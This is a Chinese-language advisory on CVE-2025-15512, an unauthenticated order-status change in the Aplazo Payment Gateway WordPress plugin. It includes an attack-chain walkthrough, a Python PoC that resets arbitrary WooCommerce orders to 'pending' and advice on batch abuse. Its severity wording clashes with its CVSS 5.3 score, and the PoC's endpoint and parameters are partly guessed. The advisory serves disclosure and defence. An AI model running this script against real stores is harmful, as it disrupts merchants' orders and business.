CVE-2025-15512 WordPress Aplazo Payment Gateway插件未授权订单状态修改漏洞

漏洞信息

漏洞编号

CVE-2025-15512

漏洞类型

缺少权限检查/未授权访问

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Aplazo Payment Gateway插件 for WordPress

漏洞概述

CVE-2025-15512是WordPress平台Aplazo Payment Gateway插件的一个高危安全漏洞。该插件专为WooCommerce设计的支付网关，在1.4.3及以下所有版本中存在严重的权限控制缺陷。漏洞源于check_success_response()函数缺少必要的权限验证机制，导致任何未认证的远程攻击者都可以调用该函数。通过构造恶意请求，攻击者能够将任意WooCommerce订单的状态强制修改为"待付款"（pending payment）状态。此漏洞虽然不直接导致数据泄露或服务器被入侵，但可能造成电商平台的订单处理流程混乱，影响正常商业交易。攻击者可以利用此漏洞对特定商户发起拒绝服务攻击，通过批量修改订单状态导致商家需要手动核实和处理大量异常订单，造成运营压力和经济损失。由于攻击复杂度低且无需任何认证，该漏洞在实际环境中容易被利用。

技术细节

漏洞根源在于Aplazo Payment Gateway插件的check_success_response()函数没有实施WordPress的权限检查机制。在正常情况下，处理支付响应的函数应当验证请求是否来自合法的支付提供商，以及当前用户是否有权限操作目标订单。然而该函数直接接收外部请求参数（如order_id），并根据参数值直接修改WooCommerce订单状态，而未进行nonce验证、用户认证或权限检查。攻击者可以通过向插件端点发送包含任意order_id的HTTP请求，利用WooCommerce的set_status()或update_status()方法将目标订单状态强制改为'pending'。由于该函数位于公共访问端点（通常为wc-api=aplazo_check_success），无需任何身份验证即可访问。攻击者只需知道目标订单ID即可实施攻击，这使得批量攻击成为可能。此漏洞属于OWASP Top 10中的A01:2021 Broken Access Control类别。

攻击链分析

STEP 1

步骤1

攻击者发现目标网站使用Aplazo Payment Gateway插件（版本<=1.4.3），确认存在可访问的支付回调端点

STEP 2

步骤2

攻击者识别出wc-api=aplazo_check_success端点，该端点调用存在漏洞的check_success_response()函数

STEP 3

步骤3

攻击者构造恶意HTTP GET请求，包含目标WooCommerce订单ID作为参数，无需携带任何认证令牌或nonce

STEP 4

步骤4

漏洞函数直接接受order_id参数，调用WooCommerce API将目标订单状态修改为'pending payment'

STEP 5

步骤5

订单状态被成功修改后，商家后台显示订单异常，需要人工介入核实，造成业务中断和运营压力

STEP 6

步骤6

攻击者可批量自动化此过程，对多个订单发起攻击，实现更大范围的拒绝服务效果

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-15512 PoC - Unauthorized Order Status Modification
# Target: WordPress with Aplazo Payment Gateway plugin <= 1.4.3

def exploit_aplazo_cve_2025_15512(target_url, order_id):
    """
    Exploit for missing authorization in check_success_response()
    Allows unauthenticated attackers to modify WooCommerce order status
    
    Parameters:
        target_url: Base URL of the WordPress site
        order_id: Target WooCommerce order ID to modify
    """
    # Construct the vulnerable endpoint
    # The check_success_response() function is typically called via wc-api parameter
    exploit_url = f"{target_url}/?wc-api=aplazo_check_success"
    
    # Payload to set order status to 'pending'
    # The vulnerable function accepts order_id parameter without validation
    payload = {
        'order_id': str(order_id),
        'status': 'pending'
    }
    
    print(f"[*] Targeting: {target_url}")
    print(f"[*] Exploiting order ID: {order_id}")
    print(f"[*] Sending malicious request...")
    
    try:
        response = requests.get(exploit_url, params=payload, timeout=10)
        
        if response.status_code == 200:
            print(f"[+] Request sent successfully")
            print(f"[*] Check if order {order_id} status changed to 'pending'")
        else:
            print(f"[-] Unexpected response: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")

# Example usage
if __name__ == "__main__":
    target = "https://example-store.com"
    target_order_id = 12345
    exploit_aplazo_cve_2025_15512(target, target_order_id)

影响范围

Aplazo Payment Gateway插件 <= 1.4.3（所有版本）

防御指南

临时缓解措施

如果无法立即升级插件，可通过WordPress防火墙规则临时阻止对?wc-api=aplazo_check_success端点的直接访问，或配置Web应用防火墙（WAF）规则过滤异常order_id参数请求。同时建议商家定期检查WooCommerce订单状态，发现异常pending订单及时处理。